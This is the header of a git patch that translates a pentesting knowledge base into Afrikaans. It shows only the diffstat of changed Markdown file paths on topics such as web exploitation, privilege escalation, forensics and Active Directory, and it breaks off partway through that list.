From 9f40607d8c19aee75a7c99ffe66f0abf222b2ede Mon Sep 17 00:00:00 2001 
From: Translator workflow Date: Sun, 11 Feb 2024 02:07:06 +0000 Subject: [PATCH] Translated to Afrikaans --- .github/pull_request_template.md | 6 +- 1911-pentesting-fox.md | 50 +- 6881-udp-pentesting-bittorrent.md | 32 +- LICENSE.md | 205 +- README.md | 83 +- android-forensics.md | 56 +- backdoors/icmpsh.md | 54 +- backdoors/salseo.md | 162 +- .../README.md | 214 +- burp-suite.md | 46 +- c2/cobalt-strike.md | 238 +- cryptography/certificates.md | 244 +- .../cipher-block-chaining-cbc-mac-priv.md | 76 +- cryptography/crypto-ctfs-tricks.md | 205 +- cryptography/electronic-code-book-ecb.md | 100 +- cryptography/hash-length-extension-attack.md | 72 +- cryptography/padding-oracle-priv.md | 108 +- cryptography/rc4-encrypt-and-decrypt.md | 36 +- emails-vulns.md | 30 +- .../linux-exploiting-basic-esp/README.md | 900 +++--- .../bypassing-canary-and-pie.md | 185 +- .../format-strings-template.md | 125 +- .../linux-exploiting-basic-esp/fusion.md | 76 +- .../linux-exploiting-basic-esp/ret2lib.md | 133 +- .../rop-leaking-libc-address/README.md | 285 +- .../rop-leaking-libc-template.md | 247 +- .../rop-syscall-execv.md | 161 +- exploiting/tools/README.md | 243 +- exploiting/tools/pwntools.md | 187 +- ...windows-exploiting-basic-guide-oscp-lvl.md | 201 +- .../basic-forensic-methodology/README.md | 56 +- .../anti-forensic-techniques.md | 176 +- .../docker-forensics.md | 100 +- .../file-integrity-monitoring.md | 50 +- .../linux-forensics.md | 405 ++- .../malware-analysis.md | 264 +- .../memory-dump-analysis/README.md | 50 +- .../partitions-file-systems-carving/README.md | 275 +- .../file-data-carving-recovery-tools.md | 102 +- .../file-data-carving-tools.md | 76 +- .../pcap-inspection/README.md | 205 +- .../pcap-inspection/dnscat-exfiltration.md | 60 +- .../usb-keyboard-pcap-analysis.md | 40 +- .../pcap-inspection/usb-keystrokes.md | 42 +- .../pcap-inspection/wifi-pcap-analysis.md | 58 +- .../pcap-inspection/wireshark-tricks.md | 146 +- .../.pyc.md | 176 +- .../README.md | 34 +- 
.../browser-artifacts.md | 219 +- .../desofuscation-vbs-cscript.exe.md | 92 +- .../local-cloud-storage.md | 142 +- .../office-file-analysis.md | 53 +- .../pdf-file-analysis.md | 54 +- .../png-tricks.md | 38 +- .../video-and-audio-file-analysis.md | 44 +- .../zips-tricks.md | 48 +- .../windows-forensics/README.md | 528 ++-- .../interesting-windows-registry-keys.md | 129 +- .../windows-forensics/windows-processes.md | 126 +- .../image-acquisition-and-mount.md | 94 +- .../volatility-cheatsheet.md | 2591 +++++++++++++++-- .../suricata-and-iptables-cheatsheet.md | 453 ++- .../brute-force.md | 1238 ++++++-- .../exfiltration.md | 611 +++- .../external-recon-methodology/README.md | 552 ++-- .../github-leaked-secrets.md | 38 +- .../wide-source-code-search.md | 46 +- .../pentesting-methodology.md | 165 +- .../pentesting-network/README.md | 752 ++--- .../pentesting-network/dhcpv6.md | 72 +- .../pentesting-network/eigrp-attacks.md | 118 +- .../glbp-and-hsrp-attacks.md | 196 +- .../pentesting-network/ids-evasion.md | 76 +- .../lateral-vlan-segmentation-bypass.md | 62 +- .../network-protocols-explained-esp.md | 78 +- .../pentesting-network/nmap-summary-esp.md | 274 +- .../pentesting-network/pentesting-ipv6.md | 153 +- ...-ns-mdns-dns-and-wpad-and-relay-attacks.md | 141 +- .../spoofing-ssdp-and-upnp-devices.md | 56 +- .../pentesting-wifi/README.md | 821 +++--- .../pentesting-wifi/evil-twin-eap-tls.md | 84 +- .../phishing-methodology/README.md | 424 ++- .../phishing-methodology/clone-a-website.md | 83 +- .../phishing-methodology/detecting-phising.md | 95 +- .../phishing-documents.md | 188 +- .../python/README.md | 50 +- .../python/basic-python.md | 314 +- .../python/bruteforce-hash-few-chars.md | 87 +- .../python/bypass-python-sandboxes/README.md | 1743 ++++++++--- .../load_name-load_const-opcode-oob-read.md | 264 +- ...s-pollution-pythons-prototype-pollution.md | 272 +- .../python/pyscript.md | 98 +- .../python/python-internal-read-gadgets.md | 58 +- .../python/venv.md | 39 +- 
.../python/web-requests.md | 123 +- .../search-exploits.md | 58 +- .../shells/README.md | 36 +- .../shells/full-ttys.md | 62 +- .../shells/linux.md | 618 +++- .../shells/msfvenom.md | 193 +- .../shells/windows.md | 729 +++-- .../threat-modeling.md | 100 +- .../tunneling-and-port-forwarding.md | 467 +-- interesting-http.md | 56 +- .../README.md | 114 +- .../ddexec.md | 106 +- linux-hardening/freeipa-pentesting.md | 158 +- .../linux-environment-variables.md | 124 +- .../linux-post-exploitation/README.md | 74 +- .../pam-pluggable-authentication-modules.md | 76 +- .../linux-privilege-escalation-checklist.md | 235 +- .../privilege-escalation/README.md | 1434 ++++----- .../privilege-escalation/cisco-vmanage.md | 105 +- .../containerd-ctr-privilege-escalation.md | 62 +- ...-command-injection-privilege-escalation.md | 532 ++-- .../docker-security/README.md | 1184 ++++++-- ...-docker-socket-for-privilege-escalation.md | 80 +- .../docker-security/apparmor.md | 258 +- ...uthn-docker-access-authorization-plugin.md | 164 +- .../docker-security/cgroups.md | 99 +- .../README.md | 695 +++-- .../docker-release_agent-cgroups-escape.md | 77 +- ...se_agent-exploit-relative-paths-to-pids.md | 90 +- .../sensitive-mounts.md | 197 +- .../docker-security/docker-privileged.md | 108 +- .../docker-security/namespaces/README.md | 44 +- .../namespaces/cgroup-namespace.md | 130 +- .../namespaces/ipc-namespace.md | 111 +- .../namespaces/mount-namespace.md | 108 +- .../namespaces/network-namespace.md | 109 +- .../namespaces/pid-namespace.md | 104 +- .../namespaces/time-namespace.md | 98 +- .../namespaces/user-namespace.md | 143 +- .../namespaces/uts-namespace.md | 107 +- .../docker-security/seccomp.md | 210 +- .../docker-security/weaponizing-distroless.md | 56 +- .../electron-cef-chromium-debugger-abuse.md | 134 +- .../escaping-from-limited-bash.md | 220 +- .../privilege-escalation/euid-ruid-suid.md | 238 +- .../interesting-groups-linux-pe/README.md | 156 +- .../lxd-privilege-escalation.md | 72 +- 
.../ld.so.conf-example.md | 192 +- .../linux-active-directory.md | 100 +- .../linux-capabilities.md | 1499 +++++----- .../privilege-escalation/logstash.md | 88 +- .../nfs-no_root_squash-misconfiguration-pe.md | 172 +- .../payloads-to-execute.md | 330 ++- .../runc-privilege-escalation.md | 56 +- .../privilege-escalation/selinux.md | 47 +- .../socket-command-injection.md | 66 +- .../splunk-lpe-and-persistence.md | 79 +- .../ssh-forward-agent-exploitation.md | 56 +- .../wildcards-spare-tricks.md | 79 +- .../privilege-escalation/write-to-root.md | 52 +- .../useful-linux-commands/README.md | 395 ++- .../bypass-bash-restrictions.md | 372 ++- .../privilege-escalation/exploiting-yum.md | 62 +- .../interesting-groups-linux-pe.md | 142 +- macos-hardening/macos-auto-start-locations.md | 1426 +++++---- macos-hardening/macos-red-teaming/README.md | 168 +- .../macos-red-teaming/macos-keychain.md | 166 +- .../macos-red-teaming/macos-mdm/README.md | 285 +- ...nrolling-devices-in-other-organisations.md | 88 +- .../macos-mdm/macos-serial-number.md | 84 +- .../README.md | 117 +- .../mac-os-architecture/README.md | 122 +- .../macos-function-hooking.md | 418 +-- .../mac-os-architecture/macos-iokit.md | 246 +- .../README.md | 1070 +++---- .../macos-kernel-extensions.md | 68 +- .../macos-kernel-vulnerabilities.md | 28 +- .../macos-system-extensions.md | 108 +- .../macos-applefs.md | 58 +- .../README.md | 379 +-- .../arm64-basic-assembly.md | 879 +++--- .../introduction-to-x64.md | 581 ++-- .../macos-basic-objective-c.md | 230 +- .../macos-bypassing-firewalls.md | 106 +- .../macos-defensive-apps.md | 58 +- ...yld-hijacking-and-dyld_insert_libraries.md | 118 +- .../macos-file-extension-apps.md | 98 +- .../README.md | 222 +- .../macos-bundles.md | 82 +- .../macos-installers-abuse.md | 94 +- .../macos-memory-dumping.md | 64 +- .../macos-sensitive-locations.md | 146 +- .../universal-binaries-and-mach-o-format.md | 324 +-- .../macos-gcd-grand-central-dispatch.md | 166 +- 
.../macos-privilege-escalation.md | 181 +- .../macos-proces-abuse/README.md | 108 +- .../macos-.net-applications-injection.md | 116 +- .../macos-proces-abuse/macos-dirty-nib.md | 114 +- .../macos-electron-applications-injection.md | 248 +- .../macos-mig-mach-interface-generator.md | 515 ++-- .../macos-thread-injection-via-task-port.md | 195 +- .../macos-xpc/README.md | 354 ++- .../macos-xpc/macos-xpc-authorization.md | 564 ++-- .../README.md | 92 +- .../macos-pid-reuse.md | 317 +- ...s-xpc_connection_get_audit_token-attack.md | 162 +- .../macos-java-apps-injection.md | 170 +- .../macos-library-injection/README.md | 358 +-- .../macos-perl-applications-injection.md | 64 +- .../macos-ruby-applications-injection.md | 44 +- .../macos-protocols.md | 133 +- .../macos-security-protections/README.md | 126 +- .../macos-dangerous-entitlements.md | 132 +- .../macos-fs-tricks/README.md | 252 +- .../macos-xattr-acls-extra-stuff.md | 206 +- .../macos-gatekeeper.md | 269 +- .../macos-launch-environment-constraints.md | 160 +- .../macos-sandbox/README.md | 219 +- .../macos-default-sandbox-debug.md | 114 +- .../macos-sandbox-debug-and-bypass/README.md | 224 +- .../macos-office-sandbox-bypasses.md | 79 +- .../macos-security-protections/macos-sip.md | 234 +- .../macos-tcc/README.md | 552 ++-- .../macos-tcc/macos-tcc-bypasses/README.md | 461 ++- .../macos-tcc-bypasses/macos-apple-scripts.md | 54 +- .../macos-tcc/macos-tcc-payloads.md | 856 +++--- .../macos-users.md | 54 +- macos-hardening/macos-useful-commands.md | 223 +- misc/references.md | 32 +- .../android-app-pentesting/README.md | 773 +++-- .../android-app-pentesting/adb-commands.md | 244 +- .../android-applications-basics.md | 448 ++- .../android-task-hijacking.md | 78 +- .../android-app-pentesting/apk-decompilers.md | 70 +- .../avd-android-virtual-device.md | 218 +- ...bypass-biometric-authentication-android.md | 89 +- .../content-protocol.md | 115 +- .../drozer-tutorial/README.md | 311 +- .../exploiting-content-providers.md | 
243 +- .../exploiting-a-debuggeable-applciation.md | 134 +- .../frida-tutorial/README.md | 430 ++- .../frida-tutorial/frida-tutorial-1.md | 168 +- .../frida-tutorial/frida-tutorial-2.md | 254 +- .../frida-tutorial/objection-tutorial.md | 253 +- .../frida-tutorial/owaspuncrackable-1.md | 192 +- .../google-ctf-2018-shall-we-play-a-game.md | 102 +- .../install-burp-certificate.md | 111 +- .../intent-injection.md | 34 +- .../make-apk-accept-ca-certificate.md | 80 +- .../manual-deobfuscation.md | 76 +- .../react-native-application.md | 66 +- .../reversing-native-libraries.md | 94 +- .../android-app-pentesting/smali-changes.md | 198 +- .../spoofing-your-location-in-play-store.md | 74 +- .../android-app-pentesting/tapjacking.md | 73 +- .../android-app-pentesting/webview-attacks.md | 141 +- mobile-pentesting/android-checklist.md | 120 +- mobile-pentesting/cordova-apps.md | 320 +- mobile-pentesting/ios-pentesting-checklist.md | 158 +- mobile-pentesting/ios-pentesting/README.md | 1120 ++++--- .../basic-ios-testing-operations.md | 168 +- .../burp-configuration-for-ios.md | 125 +- ...-entitlements-from-compiled-application.md | 60 +- .../frida-configuration-in-ios.md | 374 +-- .../ios-pentesting/ios-app-extensions.md | 82 +- .../ios-pentesting/ios-basics.md | 164 +- ...m-uri-handlers-deeplinks-custom-schemes.md | 89 +- .../ios-hooking-with-objection.md | 441 ++- .../ios-pentesting/ios-protocol-handlers.md | 34 +- .../ios-serialisation-and-encoding.md | 100 +- .../ios-pentesting/ios-testing-environment.md | 144 +- .../ios-pentesting/ios-uiactivity-sharing.md | 86 +- .../ios-pentesting/ios-uipasteboard.md | 104 +- .../ios-pentesting/ios-universal-links.md | 126 +- .../ios-pentesting/ios-webviews.md | 322 +- mobile-pentesting/xamarin-apps.md | 76 +- ...0-network-data-management-protocol-ndmp.md | 72 +- .../1026-pentesting-rusersd.md | 41 +- .../1080-pentesting-socks.md | 156 +- .../1099-pentesting-java-rmi.md | 159 +- .../11211-memcache/README.md | 232 +- 
.../11211-memcache/memcache-commands.md | 204 +- .../113-pentesting-ident.md | 90 +- .../135-pentesting-msrpc.md | 127 +- .../137-138-139-pentesting-netbios.md | 94 +- .../1414-pentesting-ibmmq.md | 254 +- .../README.md | 90 +- .../15672-pentesting-rabbitmq-management.md | 58 +- .../1723-pentesting-pptp.md | 40 +- .../1883-pentesting-mqtt-mosquitto.md | 138 +- .../2375-pentesting-docker.md | 263 +- ...-24008-24009-49152-pentesting-glusterfs.md | 56 +- .../27017-27018-mongodb.md | 320 +- .../3128-pentesting-squid.md | 64 +- .../3260-pentesting-iscsi.md | 126 +- .../3299-pentesting-saprouter.md | 86 +- .../3632-pentesting-distcc.md | 52 +- .../3690-pentesting-subversion-svn-server.md | 95 +- .../3702-udp-pentesting-ws-discovery.md | 43 +- .../43-pentesting-whois.md | 71 +- ...ntesting-erlang-port-mapper-daemon-epmd.md | 84 +- .../44134-pentesting-tiller-helm.md | 70 +- .../44818-ethernetip.md | 76 +- .../47808-udp-bacnet.md | 58 +- .../4786-cisco-smart-install.md | 56 +- .../4840-pentesting-opc-ua.md | 50 +- .../49-pentesting-tacacs+.md | 60 +- .../5000-pentesting-docker-registry.md | 266 +- ...060-50070-50075-50090-pentesting-hadoop.md | 40 +- .../512-pentesting-rexec.md | 36 +- .../515-pentesting-line-printer-daemon-lpd.md | 46 +- .../5353-udp-multicast-dns-mdns.md | 78 +- .../5439-pentesting-redshift.md | 30 +- .../554-8554-pentesting-rtsp.md | 90 +- .../5555-android-debug-bridge.md | 54 +- .../5601-pentesting-kibana.md | 56 +- .../5671-5672-pentesting-amqp.md | 95 +- .../584-pentesting-afp.md | 52 +- .../5984-pentesting-couchdb.md | 213 +- .../5985-5986-pentesting-omi.md | 58 +- .../5985-5986-pentesting-winrm.md | 346 +-- .../6000-pentesting-x11.md | 183 +- network-services-pentesting/623-udp-ipmi.md | 123 +- .../6379-pentesting-redis.md | 318 +- network-services-pentesting/69-udp-tftp.md | 54 +- .../7-tcp-udp-pentesting-echo.md | 54 +- ...09-pentesting-apache-jserv-protocol-ajp.md | 214 +- .../8086-pentesting-influxdb.md | 94 +- 
network-services-pentesting/8089-splunkd.md | 108 +- ...33-18333-38333-18444-pentesting-bitcoin.md | 48 +- .../873-pentesting-rsync.md | 138 +- .../9000-pentesting-fastcgi.md | 56 +- .../9001-pentesting-hsqldb.md | 96 +- network-services-pentesting/9100-pjl.md | 62 +- .../9200-pentesting-elasticsearch.md | 231 +- network-services-pentesting/cassandra.md | 82 +- .../ipsec-ike-vpn-pentesting.md | 246 +- .../nfs-service-pentesting.md | 140 +- .../pentesting-264-check-point-firewall-1.md | 56 +- ...ting-631-internet-printing-protocol-ipp.md | 44 +- .../pentesting-compaq-hp-insight-manager.md | 44 +- network-services-pentesting/pentesting-dns.md | 408 ++- .../pentesting-finger.md | 72 +- .../pentesting-ftp/README.md | 307 +- .../pentesting-ftp/ftp-bounce-attack.md | 57 +- .../ftp-bounce-download-2oftp-file.md | 64 +- .../pentesting-imap.md | 199 +- network-services-pentesting/pentesting-irc.md | 79 +- ...entesting-jdwp-java-debug-wire-protocol.md | 78 +- .../pentesting-kerberos-88/README.md | 82 +- .../harvesting-tickets-from-linux.md | 50 +- .../harvesting-tickets-from-windows.md | 44 +- .../pentesting-ldap.md | 286 +- .../pentesting-modbus.md | 81 +- .../README.md | 456 +-- .../types-of-mssql-users.md | 62 +- .../pentesting-mysql.md | 345 ++- network-services-pentesting/pentesting-ntp.md | 145 +- network-services-pentesting/pentesting-pop.md | 238 +- .../pentesting-postgresql.md | 738 +++-- network-services-pentesting/pentesting-rdp.md | 169 +- .../pentesting-remote-gdbserver.md | 226 +- .../pentesting-rlogin.md | 60 +- .../pentesting-rpcbind.md | 156 +- network-services-pentesting/pentesting-rsh.md | 42 +- network-services-pentesting/pentesting-sap.md | 360 ++- network-services-pentesting/pentesting-smb.md | 490 ++-- .../pentesting-smb/rpcclient-enumeration.md | 134 +- .../pentesting-smtp/README.md | 518 ++-- .../pentesting-smtp/smtp-commands.md | 62 +- .../pentesting-snmp/README.md | 283 +- .../pentesting-snmp/cisco-snmp.md | 50 +- .../pentesting-snmp/snmp-rce.md | 
67 +- network-services-pentesting/pentesting-ssh.md | 359 ++- .../pentesting-telnet.md | 306 +- network-services-pentesting/pentesting-vnc.md | 108 +- .../pentesting-voip/README.md | 414 ++- .../basic-voip-protocols/README.md | 125 +- .../sip-session-initiation-protocol.md | 219 +- .../pentesting-web/403-and-401-bypasses.md | 185 +- .../pentesting-web/README.md | 437 ++- .../aem-adobe-experience-cloud.md | 34 +- .../pentesting-web/angular.md | 814 +++--- .../pentesting-web/apache.md | 78 +- .../artifactory-hacking-guide.md | 34 +- .../pentesting-web/bolt-cms.md | 48 +- .../pentesting-web/buckets/README.md | 32 +- .../buckets/firebase-database.md | 32 +- .../pentesting-web/cgi.md | 124 +- .../pentesting-web/code-review-tools.md | 263 +- .../pentesting-web/dotnetnuke-dnn.md | 52 +- .../pentesting-web/drupal.md | 186 +- .../electron-desktop-apps/README.md | 270 +- ...solation-rce-via-electron-internal-code.md | 66 +- .../electron-contextisolation-rce-via-ipc.md | 137 +- ...n-contextisolation-rce-via-preload-code.md | 100 +- .../pentesting-web/flask.md | 127 +- .../pentesting-web/git.md | 46 +- .../pentesting-web/golang.md | 48 +- .../pentesting-web/grafana.md | 40 +- .../pentesting-web/graphql.md | 574 ++-- .../pentesting-web/gwt-google-web-toolkit.md | 47 + .../pentesting-web/h2-java-sql-database.md | 58 +- .../iis-internet-information-services.md | 214 +- .../pentesting-web/imagemagick-security.md | 74 +- .../pentesting-web/jboss.md | 50 +- .../pentesting-web/jira.md | 45 +- .../pentesting-web/joomla.md | 185 +- .../pentesting-web/jsp.md | 42 +- .../pentesting-web/laravel.md | 112 +- .../pentesting-web/moodle.md | 150 +- .../pentesting-web/nginx.md | 239 +- .../pentesting-web/nodejs-express.md | 80 +- .../pentesting-web/php-tricks-esp/README.md | 376 +-- ...object-creation-new-usd_get-a-usd_get-b.md | 108 +- .../pentesting-web/php-tricks-esp/php-ssrf.md | 62 +- .../README.md | 1074 ++++--- .../disable_functions-bypass-dl-function.md | 126 +- 
...than-3.3.0-php-greater-than-5.4-exploit.md | 46 +- .../disable_functions-bypass-mod_cgi.md | 80 +- ...p-4-greater-than-4.2.0-php-5-pcntl_exec.md | 50 +- ..._functions-bypass-php-5.2-fopen-exploit.md | 38 +- ...p-5.2.3-win32std-ext-protections-bypass.md | 38 +- ...ons-bypass-php-5.2.4-and-5.2.5-php-curl.md | 50 +- ...e_functions-bypass-php-7.0-7.4-nix-only.md | 366 ++- ...isable_functions-bypass-php-fpm-fastcgi.md | 819 +++--- ...s-bypass-php-less-than-5.2.9-on-windows.md | 108 +- ...perl-extension-safe_mode-bypass-exploit.md | 46 +- ...roc_open-and-custom-environment-exploit.md | 44 +- .../disable_functions-bypass-via-mem.md | 178 +- ...ons-php-5.2.4-ioncube-extension-exploit.md | 52 +- ...le_functions-php-5.x-shellshock-exploit.md | 68 +- .../pentesting-web/put-method-webdav.md | 126 +- .../pentesting-web/python.md | 36 +- .../pentesting-web/rocket-chat.md | 48 +- .../pentesting-web/special-http-headers.md | 171 +- .../pentesting-web/spring-actuators.md | 104 +- .../pentesting-web/symphony.md | 30 +- .../pentesting-web/tomcat.md | 253 +- .../tomcat/basic-tomcat-info.md | 150 +- .../pentesting-web/uncovering-cloudflare.md | 138 +- .../pentesting-web/vmware-esx-vcenter....md | 56 +- .../pentesting-web/waf-bypass.md | 78 +- .../pentesting-web/web-api-pentesting.md | 91 +- .../pentesting-web/werkzeug.md | 190 +- .../pentesting-web/wordpress.md | 380 ++- online-platforms-with-api.md | 106 +- other-web-tricks.md | 56 +- pentesting-dns.md | 36 +- pentesting-web/2fa-bypass.md | 144 +- pentesting-web/abusing-hop-by-hop-headers.md | 66 +- pentesting-web/account-takeover.md | 106 +- .../README.md | 690 ++--- .../browext-clickjacking.md | 114 +- ...rowext-permissions-and-host_permissions.md | 123 +- .../browext-xss-example.md | 142 +- pentesting-web/bypass-payment-process.md | 78 +- pentesting-web/cache-deception.md | 206 +- pentesting-web/captcha-bypass.md | 80 +- pentesting-web/clickjacking.md | 316 +- pentesting-web/client-side-path-traversal.md | 38 +- 
.../client-side-template-injection-csti.md | 74 +- pentesting-web/command-injection.md | 84 +- .../README.md | 799 ++--- ...ypass-self-+-unsafe-inline-with-iframes.md | 59 +- pentesting-web/cors-bypass.md | 371 ++- pentesting-web/crlf-0d-0a.md | 200 +- .../csrf-cross-site-request-forgery.md | 791 +++-- .../README.md | 252 +- .../ss-leaks.md | 32 +- pentesting-web/dependency-confusion.md | 66 +- pentesting-web/deserialization/README.md | 692 ++--- ...er-gadgets-expandedwrapper-and-json.net.md | 258 +- ...ialization-objectinputstream-readobject.md | 174 +- ...ploiting-__viewstate-knowing-the-secret.md | 34 +- .../exploiting-__viewstate-parameter.md | 187 +- ...ava-dns-deserialization-and-gadgetprobe.md | 254 +- ...va-jsf-viewstate-.faces-deserialization.md | 34 +- ...ava-transformers-to-rutime-exec-payload.md | 288 +- ...g-and-directory-interface-and-log4shell.md | 378 ++- .../README.md | 316 +- .../client-side-prototype-pollution.md | 124 +- .../express-prototype-pollution-gadgets.md | 116 +- .../prototype-pollution-to-rce.md | 250 +- .../php-deserialization-+-autoload-classes.md | 104 +- .../python-yaml-deserialization.md | 96 +- pentesting-web/domain-subdomain-takeover.md | 104 +- pentesting-web/email-injections.md | 165 +- pentesting-web/file-inclusion/README.md | 557 ++-- ..._stream_prefer_studio-+-path-disclosure.md | 70 +- .../lfi2rce-via-eternal-waiting.md | 126 +- .../lfi2rce-via-nginx-temp-files.md | 319 +- .../file-inclusion/lfi2rce-via-php-filters.md | 371 ++- .../file-inclusion/lfi2rce-via-phpinfo.md | 69 +- .../lfi2rce-via-segmentation-fault.md | 76 +- .../lfi2rce-via-temp-file-uploads.md | 62 +- .../file-inclusion/phar-deserialization.md | 86 +- .../via-php_session_upload_progress.md | 52 +- pentesting-web/file-upload/README.md | 368 ++- .../pdf-upload-xxe-and-cors-bypass.md | 28 +- ...ula-csv-doc-latex-ghostscript-injection.md | 201 +- pentesting-web/grpc-web-pentest.md | 320 +- pentesting-web/h2c-smuggling.md | 105 +- 
pentesting-web/hacking-jwt-json-web-tokens.md | 235 +- pentesting-web/hacking-with-cookies/README.md | 271 +- .../hacking-with-cookies/cookie-bomb.md | 56 +- .../cookie-jar-overflow.md | 46 +- .../hacking-with-cookies/cookie-tossing.md | 80 +- .../http-connection-contamination.md | 44 +- .../http-connection-request-smuggling.md | 48 +- .../http-request-smuggling/README.md | 631 ++-- .../browser-http-request-smuggling.md | 34 +- .../request-smuggling-in-http-2-downgrades.md | 32 +- .../http-response-smuggling-desync.md | 131 +- pentesting-web/idor.md | 34 +- pentesting-web/integer-overflow.md | 64 +- pentesting-web/ldap-injection.md | 191 +- pentesting-web/login-bypass/README.md | 104 +- .../login-bypass/sql-login-bypass.md | 50 +- pentesting-web/nosql-injection.md | 379 ++- pentesting-web/oauth-to-account-takeover.md | 224 +- pentesting-web/open-redirect.md | 156 +- pentesting-web/parameter-pollution.md | 86 +- pentesting-web/phone-number-injections.md | 36 +- .../pocs-and-polygloths-cheatsheet/README.md | 361 ++- .../web-vulns-list.md | 28 +- .../postmessage-vulnerabilities/README.md | 230 +- ...blocking-main-page-to-steal-postmessage.md | 54 +- .../bypassing-sop-with-iframes-1.md | 124 +- .../bypassing-sop-with-iframes-2.md | 116 +- ...l-postmessage-modifying-iframe-location.md | 58 +- .../proxy-waf-protections-bypass.md | 32 +- pentesting-web/race-condition.md | 330 +-- pentesting-web/rate-limit-bypass.md | 77 +- .../registration-vulnerabilities.md | 203 +- ...ular-expression-denial-of-service-redos.md | 86 +- pentesting-web/reset-password.md | 212 +- pentesting-web/reverse-tab-nabbing.md | 102 +- pentesting-web/saml-attacks/README.md | 300 +- pentesting-web/saml-attacks/saml-basics.md | 250 +- ...inclusion-edge-side-inclusion-injection.md | 221 +- pentesting-web/sql-injection/README.md | 464 +-- .../sql-injection/cypher-injection-neo4j.md | 28 +- .../sql-injection/ms-access-sql-injection.md | 182 +- .../sql-injection/mssql-injection.md | 351 ++- 
.../sql-injection/mysql-injection/README.md | 178 +- .../mysql-injection/mysql-ssrf.md | 54 +- .../sql-injection/oracle-injection.md | 150 +- .../postgresql-injection/README.md | 86 +- .../big-binary-files-upload-postgresql.md | 86 +- .../dblink-lo_import-data-exfiltration.md | 34 +- ...and-ntlm-chanllenge-response-disclosure.md | 115 +- .../pl-pgsql-password-bruteforce.md | 166 +- .../rce-with-postgresql-extensions.md | 324 +-- .../rce-with-postgresql-languages.md | 300 +- pentesting-web/sql-injection/sqlmap.md | 314 +- pentesting-web/sql-injection/sqlmap/README.md | 542 +++- .../sqlmap/second-order-injection-sqlmap.md | 91 +- .../README.md | 269 +- .../cloud-ssrf.md | 305 +- .../ssrf-vulnerable-platforms.md | 32 +- .../url-format-bypass.md | 98 +- .../README.md | 742 ++--- .../el-expression-language.md | 202 +- .../jinja2-ssti.md | 157 +- pentesting-web/unicode-injection/README.md | 66 +- .../unicode-normalization.md | 94 +- pentesting-web/web-tool-wfuzz.md | 408 ++- .../web-vulnerabilities-methodology/README.md | 181 +- pentesting-web/websocket-attacks.md | 168 +- pentesting-web/xpath-injection.md | 348 ++- pentesting-web/xs-search.md | 1152 ++++---- .../connection-pool-by-destination-example.md | 210 +- .../xs-search/connection-pool-example.md | 754 +++-- .../cookie-bomb-+-onerror-xs-leak.md | 122 +- .../xs-search/css-injection/README.md | 484 ++- .../css-injection/css-injection-code.md | 193 +- .../event-loop-blocking-+-lazy-images.md | 254 +- .../xs-search/javascript-execution-xs-leak.md | 124 +- .../performance.now-+-force-heavy-task.md | 184 +- .../xs-search/performance.now-example.md | 88 +- .../xs-search/url-max-length-client-side.md | 102 +- ...ble-stylesheet-language-transformations.md | 378 +-- .../xss-cross-site-scripting/README.md | 1167 ++++---- .../abusing-service-workers.md | 112 +- .../chrome-cache-to-xss.md | 54 +- .../debugging-client-side-js.md | 50 +- .../dom-clobbering.md | 135 +- .../xss-cross-site-scripting/dom-invader.md | 106 +- 
.../xss-cross-site-scripting/dom-xss.md | 200 +- .../iframes-in-xss-and-csp.md | 156 +- .../xss-cross-site-scripting/js-hoisting.md | 128 +- .../other-js-tricks.md | 494 ++-- .../xss-cross-site-scripting/pdf-injection.md | 36 +- .../server-side-xss-dynamic-pdf.md | 168 +- .../xss-cross-site-scripting/shadow-dom.md | 32 +- .../xss-cross-site-scripting/sniff-leak.md | 38 +- .../some-same-origin-method-execution.md | 68 +- .../xss-cross-site-scripting/steal-info-js.md | 113 +- .../xss-in-markdown.md | 112 +- .../xssi-cross-site-script-inclusion.md | 102 +- pentesting-web/xxe-xee-xml-external-entity.md | 659 +++-- .../escaping-from-gui-applications/README.md | 384 ++- physical-attacks/firmware-analysis/README.md | 258 +- .../firmware-analysis/bootloader-testing.md | 94 +- .../firmware-analysis/firmware-integrity.md | 80 +- physical-attacks/physical-attacks.md | 80 +- post-exploitation.md | 50 +- radio-hacking/README.md | 32 +- radio-hacking/low-power-wide-area-network.md | 40 +- .../pentesting-ble-bluetooth-low-energy.md | 93 +- radio-hacking/pentesting-rfid.md | 112 +- .../linux-exploiting-basic-esp/elf-tricks.md | 448 ++- reversing/common-api-used-in-malware.md | 168 +- reversing/cryptographic-algorithms/README.md | 178 +- .../unpacking-binaries.md | 66 +- .../reversing-tools-basic-methods/README.md | 415 +-- .../angr/README.md | 238 +- .../angr/angr-examples.md | 1204 ++++---- .../blobrunner.md | 294 +- .../cheat-engine.md | 143 +- .../satisfiability-modulo-theories-smt-z3.md | 144 +- reversing/reversing-tools/README.md | 139 +- reversing/reversing-tools/blobrunner.md | 294 +- reversing/word-macros.md | 42 +- ...itive-information-disclosure-from-a-web.md | 42 +- stego/esoteric-languages.md | 71 +- stego/stego-tricks.md | 176 +- todo/cookies-policy.md | 44 +- todo/hardware-hacking/README.md | 82 +- todo/hardware-hacking/i2c.md | 85 +- todo/hardware-hacking/jtag.md | 46 +- todo/hardware-hacking/radio.md | 175 +- todo/hardware-hacking/spi.md | 41 +- 
todo/hardware-hacking/uart.md | 119 +- todo/misc.md | 74 +- todo/more-tools.md | 134 +- .../radio-hacking/fissure-the-rf-framework.md | 201 +- todo/radio-hacking/flipper-zero/README.md | 48 +- .../flipper-zero/fz-125khz-rfid.md | 62 +- todo/radio-hacking/flipper-zero/fz-ibutton.md | 54 +- .../radio-hacking/flipper-zero/fz-infrared.md | 56 +- todo/radio-hacking/flipper-zero/fz-nfc.md | 91 +- todo/radio-hacking/flipper-zero/fz-sub-ghz.md | 133 +- todo/radio-hacking/ibutton.md | 56 +- todo/radio-hacking/infrared.md | 93 +- todo/radio-hacking/proxmark-3.md | 72 +- todo/radio-hacking/sub-ghz-rf.md | 99 +- todo/rust-basics.md | 538 ++-- todo/tr-069.md | 11 + welcome/about-the-author.md | 34 +- welcome/hacktricks-values-and-faq.md | 164 +- .../active-directory-methodology/README.md | 606 ++-- .../abusing-ad-mssql.md | 174 +- .../acl-persistence-abuse/README.md | 195 +- .../shadow-credentials.md | 82 +- .../ad-certificates.md | 156 +- .../ad-certificates/account-persistence.md | 70 +- .../ad-certificates/certificate-theft.md | 110 +- .../ad-certificates/domain-escalation.md | 484 ++- .../ad-certificates/domain-persistence.md | 85 +- .../ad-dns-records.md | 34 +- .../ad-information-in-printers.md | 86 +- .../asreproast.md | 108 +- .../bloodhound.md | 96 +- .../constrained-delegation.md | 62 +- .../custom-ssp.md | 66 +- .../active-directory-methodology/dcshadow.md | 112 +- .../active-directory-methodology/dcsync.md | 109 +- .../diamond-ticket.md 